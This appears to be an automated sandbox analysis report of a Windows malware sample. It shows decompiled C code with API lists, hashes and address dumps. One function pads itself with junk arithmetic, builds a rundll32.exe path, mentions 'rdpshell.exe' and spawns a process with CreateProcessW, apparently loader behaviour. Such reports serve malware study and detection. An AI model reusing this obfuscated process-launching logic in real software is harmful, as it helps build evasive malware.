                                                • Sleep.KERNEL32(0000000A,00000000,?,?,?,0040384C), ref: 004030BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: x+P$x+P
                                                • API String ID: 3472027048-2134562320
                                                • Opcode ID: 2c17174c168b62260ae6c5743225d74d5a734f81eab71e83ac5db3cb1aef7a2b
                                                • Instruction ID: 3d46a3be0707701196176bf7578f381eb66bec52de30d6d801ec7e3521836ef9
                                                • Opcode Fuzzy Hash: 2c17174c168b62260ae6c5743225d74d5a734f81eab71e83ac5db3cb1aef7a2b
                                                • Instruction Fuzzy Hash: C3C164726013508BC715CF29E98832BBFE4BB99311F0882BFD444AB3D5C7B89A49D794
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E00403330(void* __eax, signed int __edi, void* __ebp) {
                                                				struct _MEMORY_BASIC_INFORMATION _v44;
                                                				void* _v48;
                                                				signed int __ebx;
                                                				void* _t58;
                                                				signed int _t61;
                                                				int _t65;
                                                				signed int _t67;
                                                				void _t70;
                                                				int _t71;
                                                				signed int _t78;
                                                				void* _t79;
                                                				signed int _t81;
                                                				intOrPtr _t82;
                                                				signed int _t87;
                                                				signed int _t88;
                                                				signed int _t89;
                                                				signed int _t92;
                                                				void* _t96;
                                                				signed int _t99;
                                                				void* _t103;
                                                				intOrPtr _t104;
                                                				void* _t106;
                                                				void* _t108;
                                                				signed int _t113;
                                                				void* _t115;
                                                				void* _t116;
                                                
                                                				_t56 = __eax;
                                                				_t89 =  *(__eax - 4);
                                                				_t78 =  *0x500055; // 0x0
                                                				if((_t89 & 0x00000007) != 0) {
                                                					__eflags = _t89 & 0x00000005;
                                                					if((_t89 & 0x00000005) != 0) {
                                                						_pop(_t78);
                                                						__eflags = _t89 & 0x00000003;
                                                						if((_t89 & 0x00000003) == 0) {
                                                							_push(_t78);
                                                							_push(__edi);
                                                							_t116 = _t115 + 0xffffffdc;
                                                							_t103 = __eax - 0x10;
                                                							E00402D0C();
                                                							_t58 = _t103;
                                                							 *_t116 =  *_t58;
                                                							_v48 =  *((intOrPtr*)(_t58 + 4));
                                                							_t92 =  *(_t58 + 0xc);
                                                							if((_t92 & 0x00000008) != 0) {
                                                								_t79 = _t103;
                                                								_t113 = _t92 & 0xfffffff0;
                                                								_t99 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									VirtualQuery(_t79,  &_v44, 0x1c);
                                                									_t61 = VirtualFree(_t79, 0, 0x8000);
                                                									__eflags = _t61;
                                                									if(_t61 == 0) {
                                                										_t99 = _t99 | 0xffffffff;
                                                										goto L10;
                                                									}
                                                									_t104 = _v44.RegionSize;
                                                									__eflags = _t113 - _t104;
                                                									if(_t113 > _t104) {
                                                										_t113 = _t113 - _t104;
                                                										_t79 = _t79 + _t104;
                                                										continue;
                                                									}
                                                									goto L10;
                                                								}
                                                							} else {
                                                								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
                                                								if(_t65 == 0) {
                                                									_t99 = __edi | 0xffffffff;
                                                								} else {
                                                									_t99 = 0;
                                                								}
                                                							}
                                                							L10:
                                                							if(_t99 == 0) {
                                                								 *_v48 =  *_t116;
                                                								 *( *_t116 + 4) = _v48;
                                                							}
                                                							 *0x502b74 = 0;
                                                							return _t99;
                                                						} else {
                                                							return 0xffffffff;
                                                						}
                                                					} else {
                                                						goto L31;
                                                					}
                                                				} else {
                                                					__eflags = __bl;
                                                					__ebx =  *__edx;
                                                					if(__eflags != 0) {
                                                						while(1) {
                                                							__eax = 0x100;
                                                							asm("lock cmpxchg [ebx], ah");
                                                							if(__eflags == 0) {
                                                								goto L14;
                                                							}
                                                							asm("pause");
                                                							__eflags =  *0x500985;
                                                							if(__eflags != 0) {
                                                								continue;
                                                							} else {
                                                								Sleep(0);
                                                								__edx = __edx;
                                                								__ecx = __ecx;
                                                								__eax = 0x100;
                                                								asm("lock cmpxchg [ebx], ah");
                                                								if(__eflags != 0) {
                                                									Sleep(0xa);
                                                									__edx = __edx;
                                                									__ecx = __ecx;
                                                									continue;
                                                								}
                                                							}
                                                							goto L14;
                                                						}
                                                					}
                                                					L14:
                                                					_t14 = __edx + 0x14;
                                                					 *_t14 =  *(__edx + 0x14) - 1;
                                                					__eflags =  *_t14;
                                                					__eax =  *(__edx + 0x10);
                                                					if( *_t14 == 0) {
                                                						__eflags = __eax;
                                                						if(__eax == 0) {
                                                							L20:
                                                							 *(__ebx + 0x14) = __eax;
                                                						} else {
                                                							__eax =  *(__edx + 0xc);
                                                							__ecx =  *(__edx + 8);
                                                							 *(__eax + 8) = __ecx;
                                                							 *(__ecx + 0xc) = __eax;
                                                							__eax = 0;
                                                							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
                                                							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
                                                								goto L20;
                                                							}
                                                						}
                                                						 *__ebx = __al;
                                                						__eax = __edx;
                                                						__edx =  *(__edx - 4);
                                                						__bl =  *0x500055; // 0x0
                                                						L31:
                                                						__eflags = _t78;
                                                						_t81 = _t89 & 0xfffffff0;
                                                						_push(_t101);
                                                						_t106 = _t56;
                                                						if(__eflags != 0) {
                                                							while(1) {
                                                								_t67 = 0x100;
                                                								asm("lock cmpxchg [0x500ae4], ah");
                                                								if(__eflags == 0) {
                                                									goto L32;
                                                								}
                                                								asm("pause");
                                                								__eflags =  *0x500985;
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									Sleep(0);
                                                									_t67 = 0x100;
                                                									asm("lock cmpxchg [0x500ae4], ah");
                                                									if(__eflags != 0) {
                                                										Sleep(0xa);
                                                										continue;
                                                									}
                                                								}
                                                								goto L32;
                                                							}
                                                						}
                                                						L32:
                                                						__eflags = (_t106 - 4)[_t81] & 0x00000001;
                                                						_t87 = (_t106 - 4)[_t81];
                                                						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
                                                							_t67 = _t81 + _t106;
                                                							_t88 = _t87 & 0xfffffff0;
                                                							_t81 = _t81 + _t88;
                                                							__eflags = _t88 - 0xb30;
                                                							if(_t88 >= 0xb30) {
                                                								_t67 = E00402B84(_t67);
                                                							}
                                                						} else {
                                                							_t88 = _t87 | 0x00000008;
                                                							__eflags = _t88;
                                                							(_t106 - 4)[_t81] = _t88;
                                                						}
                                                						__eflags =  *(_t106 - 4) & 0x00000008;
                                                						if(( *(_t106 - 4) & 0x00000008) != 0) {
                                                							_t88 =  *(_t106 - 8);
                                                							_t106 = _t106 - _t88;
                                                							_t81 = _t81 + _t88;
                                                							__eflags = _t88 - 0xb30;
                                                							if(_t88 >= 0xb30) {
                                                								_t67 = E00402B84(_t106);
                                                							}
                                                						}
                                                						__eflags = _t81 - 0x13ffe0;
                                                						if(_t81 == 0x13ffe0) {
                                                							__eflags =  *0x500aec - 0x13ffe0;
                                                							if( *0x500aec != 0x13ffe0) {
                                                								_t82 = _t106 + 0x13ffe0;
                                                								E00402C24(_t67);
                                                								 *((intOrPtr*)(_t82 - 4)) = 2;
                                                								 *0x500aec = 0x13ffe0;
                                                								 *0x500ae8 = _t82;
                                                								 *0x500ae4 = 0;
                                                								__eflags = 0;
                                                								return 0;
                                                							} else {
                                                								_t108 = _t106 - 0x10;
                                                								_t70 =  *_t108;
                                                								_t96 =  *(_t108 + 4);
                                                								 *(_t70 + 4) = _t96;
                                                								 *_t96 = _t70;
                                                								 *0x500ae4 = 0;
                                                								_t71 = VirtualFree(_t108, 0, 0x8000);
                                                								__eflags = _t71 - 1;
                                                								asm("sbb eax, eax");
                                                								return _t71;
                                                							}
                                                						} else {
                                                							 *(_t106 - 4) = _t81 + 3;
                                                							 *(_t106 - 8 + _t81) = _t81;
                                                							E00402BC4(_t106, _t88, _t81);
                                                							 *0x500ae4 = 0;
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                					} else {
                                                						__eflags = __eax;
                                                						 *(__edx + 0x10) = __ecx;
                                                						 *(__ecx - 4) = __eax;
                                                						if(__eflags == 0) {
                                                							__ecx =  *(__ebx + 8);
                                                							 *(__edx + 0xc) = __ebx;
                                                							 *(__edx + 8) = __ecx;
                                                							 *(__ecx + 0xc) = __edx;
                                                							 *(__ebx + 8) = __edx;
                                                							 *__ebx = 0;
                                                							__eax = 0;
                                                							__eflags = 0;
                                                							_pop(__ebx);
                                                							return 0;
                                                						} else {
                                                							__eax = 0;
                                                							__eflags = 0;
                                                							 *__ebx = __al;
                                                							_pop(__ebx);
                                                							return 0;
                                                						}
                                                					}
                                                				}
                                                			}





























                                                0x00403330
                                                0x00403330
                                                0x00403339
                                                0x0040333f
                                                0x00403428
                                                0x0040342b
                                                0x00403518
                                                0x00403519
                                                0x0040351c
                                                0x00402dbc
                                                0x00402dbe
                                                0x00402dc0
                                                0x00402dc5
                                                0x00402dc8
                                                0x00402dcd
                                                0x00402dd1
                                                0x00402dd7
                                                0x00402ddb
                                                0x00402de1
                                                0x00402dfd
                                                0x00402e01
                                                0x00402e04
                                                0x00402e04
                                                0x00402e06
                                                0x00402e0e
                                                0x00402e1b
                                                0x00402e20
                                                0x00402e22
                                                0x00402e24
                                                0x00402e27
                                                0x00402e27
                                                0x00402e29
                                                0x00402e2d
                                                0x00402e2f
                                                0x00402e31
                                                0x00402e33
                                                0x00000000
                                                0x00402e33
                                                0x00000000
                                                0x00402e2f
                                                0x00402de3
                                                0x00402deb
                                                0x00402df2
                                                0x00402df8
                                                0x00402df4
                                                0x00402df4
                                                0x00402df4
                                                0x00402df2
                                                0x00402e37
                                                0x00402e39
                                                0x00402e42
                                                0x00402e4b
                                                0x00402e4b
                                                0x00402e4e
                                                0x00402e5e
                                                0x00403522
                                                0x00403527
                                                0x00403527
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403345
                                                0x00403345
                                                0x00403347
                                                0x00403349
                                                0x004033ac
                                                0x004033ac
                                                0x004033b1
                                                0x004033b5
                                                0x00000000
                                                0x00000000
                                                0x004033b7
                                                0x004033b9
                                                0x004033c0
                                                0x00000000
                                                0x004033c2
                                                0x004033c6
                                                0x004033cb
                                                0x004033cc
                                                0x004033cd
                                                0x004033d2
                                                0x004033d6
                                                0x004033e0
                                                0x004033e5
                                                0x004033e6
                                                0x00000000
                                                0x004033e6
                                                0x004033d6
                                                0x00000000
                                                0x004033c0
                                                0x004033ac
                                                0x0040334b
                                                0x0040334b
                                                0x0040334b
                                                0x0040334b
                                                0x0040334f
                                                0x00403352
                                                0x00403380
                                                0x00403382
                                                0x00403397
                                                0x00403397
                                                0x00403384
                                                0x00403384
                                                0x00403387
                                                0x0040338a
                                                0x0040338d
                                                0x00403390
                                                0x00403392
                                                0x00403395
                                                0x00000000
                                                0x00000000
                                                0x00403395
                                                0x0040339a
                                                0x0040339c
                                                0x0040339e
                                                0x004033a1
                                                0x00403431
                                                0x00403434
                                                0x00403436
                                                0x00403438
                                                0x00403439
                                                0x0040343b
                                                0x004033ec
                                                0x004033ec
                                                0x004033f1
                                                0x004033f9
                                                0x00000000
                                                0x00000000
                                                0x004033fb
                                                0x004033fd
                                                0x00403404
                                                0x00000000
                                                0x00403406
                                                0x00403408
                                                0x0040340d
                                                0x00403412
                                                0x0040341a
                                                0x0040341e
                                                0x00000000
                                                0x0040341e
                                                0x0040341a
                                                0x00000000
                                                0x00403404
                                                0x004033ec
                                                0x0040343d
                                                0x0040343d
                                                0x00403445
                                                0x00403449
                                                0x00403480
                                                0x00403483
                                                0x00403486
                                                0x00403488
                                                0x0040348e
                                                0x00403490
                                                0x00403490
                                                0x0040344b
                                                0x0040344b
                                                0x0040344b
                                                0x0040344e
                                                0x0040344e
                                                0x00403452
                                                0x00403456
                                                0x00403498
                                                0x0040349b
                                                0x0040349d
                                                0x0040349f
                                                0x004034a5
                                                0x004034a9
                                                0x004034a9
                                                0x004034a5
                                                0x00403458
                                                0x0040345e
                                                0x004034b0
                                                0x004034ba
                                                0x004034e8
                                                0x004034ee
                                                0x004034f3
                                                0x004034fa
                                                0x00403504
                                                0x0040350a
                                                0x00403511
                                                0x00403515
                                                0x004034bc
                                                0x004034bc
                                                0x004034bf
                                                0x004034c1
                                                0x004034c4
                                                0x004034c7
                                                0x004034c9
                                                0x004034d8
                                                0x004034dd
                                                0x004034e0
                                                0x004034e4
                                                0x004034e4
                                                0x00403460
                                                0x00403463
                                                0x00403466
                                                0x0040346e
                                                0x00403473
                                                0x0040347a
                                                0x0040347e
                                                0x0040347e
                                                0x00403354
                                                0x00403354
                                                0x00403356
                                                0x0040335c
                                                0x0040335f
                                                0x00403368
                                                0x0040336b
                                                0x0040336e
                                                0x00403371
                                                0x00403374
                                                0x00403377
                                                0x0040337a
                                                0x0040337a
                                                0x0040337c
                                                0x0040337d
                                                0x00403361
                                                0x00403361
                                                0x00403361
                                                0x00403363
                                                0x00403365
                                                0x00403366
                                                0x00403366
                                                0x0040335f
                                                0x00403352

                                                APIs
                                                • Sleep.KERNEL32(00000000,?,?,00000000,00402FA2), ref: 004033C6
                                                • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,00402FA2), ref: 004033E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 54fd6bdb01a5683e4c256ea1a44718bb24c06b3cbbe914b29bdd126fc742ad81
                                                • Instruction ID: 594f2e475e2ef9a1e4c6aa4b7454f7a07816349c63cc202afb12dfd344af9c94
                                                • Opcode Fuzzy Hash: 54fd6bdb01a5683e4c256ea1a44718bb24c06b3cbbe914b29bdd126fc742ad81
                                                • Instruction Fuzzy Hash: FA7113716043408FD716CF29CE88B1BBBD8AB95315F14827FE848AB3D2D6B8C945C759
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E004F4848(char __eax, void* __ebx, intOrPtr __ecx, struct _SECURITY_ATTRIBUTES* __edx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v8;
                                                				struct _SECURITY_ATTRIBUTES* _v12;
                                                				intOrPtr _v16;
                                                				char _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				void* _v52;
                                                				short _v72;
                                                				intOrPtr _v76;
                                                				intOrPtr _v112;
                                                				char _v120;
                                                				intOrPtr _v124;
                                                				char _v128;
                                                				char _v132;
                                                				signed int _v136;
                                                				int _v140;
                                                				signed int _t171;
                                                				signed int _t172;
                                                				signed int _t173;
                                                				signed int _t174;
                                                				signed int _t177;
                                                				signed int _t180;
                                                				signed int _t181;
                                                				signed int _t184;
                                                				signed int _t186;
                                                				signed int _t188;
                                                				signed int _t193;
                                                				signed int _t194;
                                                				signed int _t196;
                                                				signed int _t198;
                                                				signed int _t220;
                                                				signed int _t228;
                                                				signed int _t231;
                                                				intOrPtr _t235;
                                                				signed int _t238;
                                                				signed int _t240;
                                                				signed int _t241;
                                                				signed int _t244;
                                                				signed int _t246;
                                                				signed int _t247;
                                                				signed int _t248;
                                                				signed int _t250;
                                                				signed int _t252;
                                                				signed int _t254;
                                                				int _t263;
                                                				signed int _t269;
                                                				signed int _t271;
                                                				signed int _t274;
                                                				signed int _t292;
                                                				signed int _t295;
                                                				signed int _t301;
                                                				signed int _t302;
                                                				signed int _t314;
                                                				intOrPtr _t317;
                                                				signed int _t321;
                                                				intOrPtr _t323;
                                                				intOrPtr _t325;
                                                				intOrPtr _t332;
                                                				signed int _t334;
                                                				intOrPtr _t346;
                                                				signed int _t348;
                                                				signed int _t349;
                                                				signed int _t352;
                                                				signed int _t353;
                                                				signed int _t354;
                                                				signed int _t357;
                                                				signed int _t359;
                                                				signed int _t360;
                                                				signed int _t367;
                                                				intOrPtr _t369;
                                                				signed int _t378;
                                                				intOrPtr _t409;
                                                				intOrPtr _t410;
                                                				signed int _t419;
                                                				void* _t424;
                                                				void* _t425;
                                                				intOrPtr _t426;
                                                				void* _t427;
                                                				void* _t430;
                                                				void* _t435;
                                                				signed int _t443;
                                                				void* _t447;
                                                
                                                				_t422 = __esi;
                                                				_t421 = __edi;
                                                				_t424 = _t425;
                                                				_t426 = _t425 + 0xffffff78;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_v136 = 0;
                                                				_v140 = 0;
                                                				_v132 = 0;
                                                				_v128 = 0;
                                                				_v20 = 0;
                                                				_v52 = 0;
                                                				_v16 = __ecx;
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				E00406AAC( &_v8);
                                                				E00406AAC( &_v12);
                                                				_push(_t424);
                                                				_push(0x4f4f77);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t426;
                                                				_t171 =  *0x4fef3c; // 0x1cb932a9
                                                				E004FEF38 = _t171;
                                                				_t172 =  *0x4fef28; // 0x3c79b5d4
                                                				 *0x4fef3c = _t172;
                                                				_t173 = E004FEF38; // 0xc3c34fdc
                                                				_t427 = _t173 -  *0x4fef3c; // 0x1cb932a9
                                                				if(_t427 >= 0) {
                                                					_t174 =  *0x4feecc; // 0xd26bafe0
                                                					__eflags = _t174 + E004FEF34 - E004FEF34; // 0xc3c34ef0
                                                					if(__eflags == 0) {
                                                						asm("fild dword [0x4feedc]");
                                                						E004FEF50 = E004048D8();
                                                					}
                                                					L6:
                                                					 *0x4feeec =  *0x4fef3c * 0x9b;
                                                					_t177 =  *0x4feef0; // 0x44632301
                                                					 *0x4feef0 = E0040489C(_t177);
                                                					asm("fild dword [0x4fef38]");
                                                					 *0x4fef04 = E004048D8();
                                                					_t180 = E004FEF20; // 0x6e687a1a
                                                					E004FEF0C = _t180;
                                                					_t181 =  *0x4fef4c; // 0x43c1493c
                                                					E004FEF20 = _t181 +  *0x4feeec;
                                                					_push(_t424);
                                                					_push(0x4f4f22);
                                                					_push( *[fs:eax]);
                                                					 *[fs:eax] = _t426;
                                                					_t184 =  *0x4feea0; // 0xa1d900
                                                					 *0x4feea0 = E0040489C(_t184);
                                                					_t186 =  *0x4feea0; // 0xa1d900
                                                					 *0x4feea0 = E0040489C(_t186);
                                                					_t188 =  *0x4feea0; // 0xa1d900
                                                					_t430 = _t188 -  *0x4feea0; // 0xa1d900
                                                					if(_t430 > 0) {
                                                						_push(_v36);
                                                						_t419 =  *0x4feecc; // 0xd26bafe0
                                                						_t367 =  *0x4fef30; // 0xa1d816
                                                						 *0x4fef04 = E004EE798(_t367, 0, _v28, _t419, _t430);
                                                						_t369 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4feee8 = E0040489C(_t369);
                                                					}
                                                					_v32 = _v24 + 4;
                                                					if(0xca -  *0x4fef3c >= 0xd9) {
                                                						_t193 =  *0x4fef3c * 0x58;
                                                						__eflags = _t193;
                                                						 *0x4fef30 = _t193;
                                                					} else {
                                                						_v36 = _v40 - _v28;
                                                					}
                                                					_t194 =  *0x4fef04; // 0x43c14963
                                                					E004FEF50 = _t194 *  *0x4feef0;
                                                					_t196 = E004FEF20; // 0x6e687a1a
                                                					 *0x4feed8 = _t196 + 0x87;
                                                					_t198 =  *0x4fef04; // 0x43c14963
                                                					 *0x4feedc = _t198;
                                                					E004F4258( &_v128, 0, _t421, _t422); // executed
                                                					E0040713C( &_v52, L"system32\\rundll32.exe", _v128);
                                                					E00407400( &_v132, _v52);
                                                					if(E00414964(_v132, 1) != 0) {
                                                						L25:
                                                						_v32 = (_v44 << 3) + (_v44 << 3) * 8;
                                                						_v36 = _v28 - 0x9c;
                                                						E00406CF4( &_v20, _v20);
                                                						asm("fild dword [0x4feecc]");
                                                						 *0x4fef28 = E004048CC();
                                                						 *0x4fef40 = E004F3F2C(0x4feef0,  &_v40, 0x4feeec, _t443, 0x4feef4,  &_v48,  &_v36,  &_v28);
                                                						_t220 =  *0x4feeec; // 0xb52124f2
                                                						 *0x4feeec = E0040489C(_t220);
                                                						E004049A8( &_v120, 0x44);
                                                						_v40 = _v24 * _v36;
                                                						_v44 = _v28 * _v32;
                                                						_t228 = E004FEF38; // 0xc3c34fdc
                                                						 *0x4fef3c = _t228;
                                                						E004FEF50 =  *0x4fef48 * 0xb1;
                                                						 *0x4feedc =  *0x4fef44 * 0x16;
                                                						_t231 =  *0x4feea0; // 0xa1d900
                                                						 *0x4feef4 = _t231 -  *0x4feef0;
                                                						_v120 = 0x44;
                                                						_v112 = 0;
                                                						_v76 = 1;
                                                						_v44 = 0;
                                                						if(_v44 >= 4) {
                                                							L29:
                                                							_t235 =  *0x4fef40; // 0x3c79b5d4
                                                							_v124 = _t235 + 4;
                                                							asm("fild dword [ebp-0x78]");
                                                							 *0x4fef3c = E004048D8();
                                                							_t238 =  *0x4feea0; // 0xa1d900
                                                							E004FEF50 = _t238 -  *0x4feefc;
                                                							_t240 =  *0x4feedc; // 0xbc3e19a
                                                							 *0x4feed8 = _t240;
                                                							_t241 =  *0x4feef0; // 0x44632301
                                                							_v124 = _t241 + 0x33;
                                                							asm("fild dword [ebp-0x78]");
                                                							 *0x4feef0 = E004048CC();
                                                							_t244 = E004FEF0C; // 0xb52124bf
                                                							 *0x4fef04 = _t244 * E004FEF10;
                                                							_v72 = 0;
                                                							_t246 =  *0x4fef18; // 0xbc3e19a
                                                							E004FEF38 = _t246;
                                                							_t247 =  *0x4fef18; // 0xbc3e19a
                                                							E004FEF38 = _t247;
                                                							_t248 = E004FEF38; // 0xc3c34fdc
                                                							_t447 = _t248 - E004FEF38; // 0xc3c34fdc
                                                							if(_t447 >= 0) {
                                                								L34:
                                                								asm("fild dword [0x4feef4]");
                                                								 *0x4fef18 = E004048CC();
                                                								_t250 = E004FEF0C; // 0xb52124bf
                                                								E004FEF34 = _t250 + E004FEF10;
                                                								_t252 =  *0x4feeec; // 0xb52124f2
                                                								 *0x4fef4c = _t252 + 0x55;
                                                								_t254 =  *0x4fef04; // 0x43c14963
                                                								 *0x4feed8 = _t254 + 0x53;
                                                								_push(_v16);
                                                								_push( &_v120);
                                                								_push(0);
                                                								_push(0);
                                                								_push(0x20);
                                                								E004F37A4(_v8, 0,  &_v140, _t421, _t422); // executed
                                                								E004071B8();
                                                								_t263 = CreateProcessW(0, E004070B4(_v136), _v12, E004F5034, _v140, E004F502C, _v52, 0, 0, 0); // executed
                                                								if(_t263 != 0) {
                                                									_v36 = _v48 * 0xdf;
                                                									_v28 = _v32 * 0x9d;
                                                									_t292 =  *0x4feecc; // 0xd26bafe0
                                                									_v124 = _t292 + 4;
                                                									asm("fild dword [ebp-0x78]");
                                                									 *0x4fef40 = E004048D8();
                                                									 *0x4feea0 =  *0x4feea0 + 0xa6;
                                                									_t295 =  *0x4feea0; // 0xa1d900
                                                									 *0x4feee8 = _t295 + _t295 + (_t295 + _t295) * 4;
                                                									 *0x4fef44 = E004F0EBC( &_v40,  &E004FEF38, _t295 + _t295);
                                                								}
                                                								_v40 = _v48 + _v28;
                                                								_v124 = _v44 + 0x67;
                                                								asm("fild dword [ebp-0x78]");
                                                								_v36 = E004048CC();
                                                								_t269 = E004FEED0; // 0xc3c34ef0
                                                								 *0x4fef4c = _t269 - 0x36;
                                                								_t271 =  *0x4fef48; // 0xc3c34ef0
                                                								 *0x4fef4c = _t271;
                                                								E004FEED0 = 0x35 -  *0x4feeec;
                                                								_t274 = E004FEF00; // 0xa3b3f6c0
                                                								 *0x4feeec = _t274 + 0x33;
                                                								_pop(_t409);
                                                								 *[fs:eax] = _t409;
                                                								_pop(_t410);
                                                								 *[fs:eax] = _t410;
                                                								_push(E004F4F7E);
                                                								E00406A68( &_v140, 2);
                                                								E004069A8( &_v132);
                                                								E004069F0( &_v128);
                                                								E004069F0( &_v52);
                                                								E004069A8( &_v20);
                                                								return E00406A68( &_v12, 2);
                                                							}
                                                							_v48 = 0;
                                                							if(_v48 >= 1) {
                                                								L32:
                                                								_t301 =  *0x4fef44; // 0x38993
                                                								 *0x4feed8 = _t301;
                                                								_t302 =  *0x4feed8; // 0x1cb9338e
                                                								if(_t302 -  *0x4feea0 < 0xcb) {
                                                									_v28 = _v24 + 0xbb;
                                                								}
                                                								goto L34;
                                                							} else {
                                                								goto L31;
                                                							}
                                                							do {
                                                								L31:
                                                								_v48 = _v48 + 1;
                                                								E00406CF4( &_v20, _v20);
                                                							} while (_v48 < 1);
                                                							goto L32;
                                                						}
                                                						_v44 = _v44 + 1;
                                                						_v48 = 0;
                                                						do {
                                                							E00407678(_v20, 0, 1,  &_v20);
                                                							_v48 = _v48 + 1;
                                                						} while (_v48 != 0xb);
                                                						_v24 = _v40 + 0x72;
                                                						_t314 =  *0x4feeec; // 0xb52124f2
                                                						_v124 = _t314 + 4;
                                                						asm("fild dword [ebp-0x78]");
                                                						 *0x4feefc = E004048D8();
                                                						_t317 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4fef18 = _t317 + 7;
                                                						goto L29;
                                                					} else {
                                                						if(_v44 <= _v28) {
                                                							L17:
                                                							_v36 = 0;
                                                							do {
                                                								_t321 = E004FEED0; // 0xc3c34ef0
                                                								 *0x4fef30 = _t321 + E004FEED0;
                                                								_t323 =  *0x4feee8; // 0xdcd0f434
                                                								 *0x4fef40 = _t323 - E004FEF38;
                                                								_t325 =  *0x4feee0; // 0x747938b
                                                								_v124 = _t325 + 0xda;
                                                								asm("fild dword [ebp-0x78]");
                                                								 *0x4feecc = E004048CC();
                                                								_v36 = _v36 + 1;
                                                							} while (_v36 != 5);
                                                							 *0x4feeec =  *0x4feea0 * 0xa4;
                                                							E00407678(_v20, 0, 1,  &_v20);
                                                							_t332 =  *0x4feefc; // 0x4b08dcc7
                                                							 *0x4feefc = E0040489C(_t332);
                                                							_t334 =  *0x4fef28; // 0x3c79b5d4
                                                							E004FEF10 = _t334 + 4;
                                                							E00406D48( &_v52, L"C:\\Windows\\System32\\rundll32.exe");
                                                							_v48 = 0;
                                                							do {
                                                								E00407640(_v20, _v20);
                                                								if(0 == 0) {
                                                									_t354 = E004FEED0; // 0xc3c34ef0
                                                									E004FEED0 = E0040489C(_t354);
                                                								}
                                                								_v28 = _v24 + 0x57;
                                                								_v48 = _v48 + 1;
                                                							} while (_v48 != 7);
                                                							_v32 = _v44 + _v44 * 4 + (_v44 + _v44 * 4) * 4;
                                                							_t346 =  *0x4feee0; // 0x747938b
                                                							 *0x4fef14 = _t346 -  *0x4fef44;
                                                							_t348 =  *0x4feef4; // 0xb52124ca
                                                							E004FEF2C = _t348;
                                                							_t349 =  *0x4feea0; // 0xa1d900
                                                							E004FEF34 = _t349;
                                                							if(_v44 - _v40 < 0x9d) {
                                                								_t352 =  *0x4fef3c; // 0x1cb932a9
                                                								_t353 = _t352 - E004FEF2C;
                                                								_t443 = _t353;
                                                								 *0x4fef4c = _t353;
                                                							}
                                                							goto L25;
                                                						}
                                                						_v44 = 0;
                                                						if(_v44 >= 0xa) {
                                                							goto L17;
                                                						} else {
                                                							goto L14;
                                                						}
                                                						do {
                                                							L14:
                                                							_v44 = _v44 + 1;
                                                							_t357 = E004FEF50; // 0xa3b3f6c0
                                                							E004FEF50 = E0040489C(_t357);
                                                							_t359 =  *0x4fef28; // 0x3c79b5d4
                                                							 *0x4feecc = _t359;
                                                							_t360 =  *0x4feecc; // 0xd26bafe0
                                                							_t435 = _t360 - E004FEF50; // 0xa3b3f6c0
                                                							if(_t435 > 0) {
                                                								_v124 = _v40 + 4;
                                                								asm("fild dword [ebp-0x78]");
                                                								_v28 = E004048D8();
                                                							}
                                                						} while (_v44 < 0xa);
                                                						goto L17;
                                                					}
                                                				}
                                                				_v48 = 0;
                                                				if(_v48 >= 4) {
                                                					L3:
                                                					_v124 = _v44 + 0x46;
                                                					asm("fild dword [ebp-0x78]");
                                                					_v36 = E004048CC();
                                                					E00406CF4( &_v20, L"rdpshell.exe");
                                                					_t378 =  *0x4fef28; // 0x3c79b5d4
                                                					 *0x4fef28 = E0040489C(_t378);
                                                					goto L6;
                                                				} else {
                                                					goto L2;
                                                				}
                                                				do {
                                                					L2:
                                                					_v48 = _v48 + 1;
                                                					_v124 = _v40 + 2;
                                                					asm("fild dword [ebp-0x78]");
                                                					_v28 = E004048CC();
                                                				} while (_v48 < 4);
                                                				goto L3;
                                                			}


























































































                                                0x004f4848
                                                0x004f4848
                                                0x004f4849
                                                0x004f484b
                                                0x004f4851
                                                0x004f4852
                                                0x004f4853
                                                0x004f4856
                                                0x004f485c
                                                0x004f4862
                                                0x004f4865
                                                0x004f4868
                                                0x004f486b
                                                0x004f486e
                                                0x004f4871
                                                0x004f4874
                                                0x004f487a
                                                0x004f4882
                                                0x004f4889
                                                0x004f488a
                                                0x004f488f
                                                0x004f4892
                                                0x004f4895
                                                0x004f489a
                                                0x004f489f
                                                0x004f48a4
                                                0x004f48a9
                                                0x004f48ae
                                                0x004f48b4
                                                0x004f4910
                                                0x004f491b
                                                0x004f4921
                                                0x004f4923
                                                0x004f492e
                                                0x004f492e
                                                0x004f4933
                                                0x004f493d
                                                0x004f4942
                                                0x004f494c
                                                0x004f4951
                                                0x004f495c
                                                0x004f4961
                                                0x004f4966
                                                0x004f496b
                                                0x004f4976
                                                0x004f497d
                                                0x004f497e
                                                0x004f4983
                                                0x004f4986
                                                0x004f4989
